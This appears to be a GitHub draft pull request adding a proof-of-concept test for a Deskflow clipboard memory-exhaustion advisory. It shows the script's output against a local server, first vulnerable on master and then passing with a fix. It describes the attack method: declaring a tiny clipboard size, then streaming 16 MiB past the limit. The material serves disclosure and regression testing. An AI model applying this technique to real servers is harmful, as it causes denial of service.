
test(security): add poc for clipboard chunk accumulation (GHSA-jf7g-qghg-p54x) #13

Draft
nbolton wants to merge 1 commit into main from poc/clip-exhaust

nbolton (Member) commented Jul 3, 2026

GHSA-jf7g-qghg-p54x

Master:

```
./cve_XXXX_XXXXX_clipboard_exhaustion.py
CVE-XXXX-XXXXX - unbounded clipboard chunk accumulation (GHSA-jf7g-qghg-p54x)
target: 127.0.0.1:24800  name: 'deskflow-poc'  transport: tls
declaring 1 byte(s), streaming 16 MiB (configured limit 3 MiB)
sampling rss of server pid 1495024

    streamed 16 MiB
  accepted: 16 MiB (16777216 bytes), peer alive after stream: True
  server rss: 70 -> 88 MiB (delta 18 MiB, threshold 8 MiB)
[FAIL] server retained the oversized buffer (rss grew 19009536 bytes) - VULNERABLE (GHSA-jf7g-qghg-p54x)
```

https://github.com/deskflow/deskflow-ghsa-jf7g-qghg-p54x/pull/1

```
./cve_XXXX_XXXXX_clipboard_exhaustion.py
CVE-XXXX-XXXXX - unbounded clipboard chunk accumulation (GHSA-jf7g-qghg-p54x)
target: 127.0.0.1:24800  name: 'deskflow-poc'  transport: tls
declaring 1 byte(s), streaming 16 MiB (configured limit 3 MiB)
sampling rss of server pid 1512557

    streamed 16 MiB
  accepted: 16 MiB (16777216 bytes), peer alive after stream: True
  server rss: 69 -> 72 MiB (delta 2 MiB, threshold 8 MiB)
[PASS] server rss stayed flat - oversized data discarded on receive
```
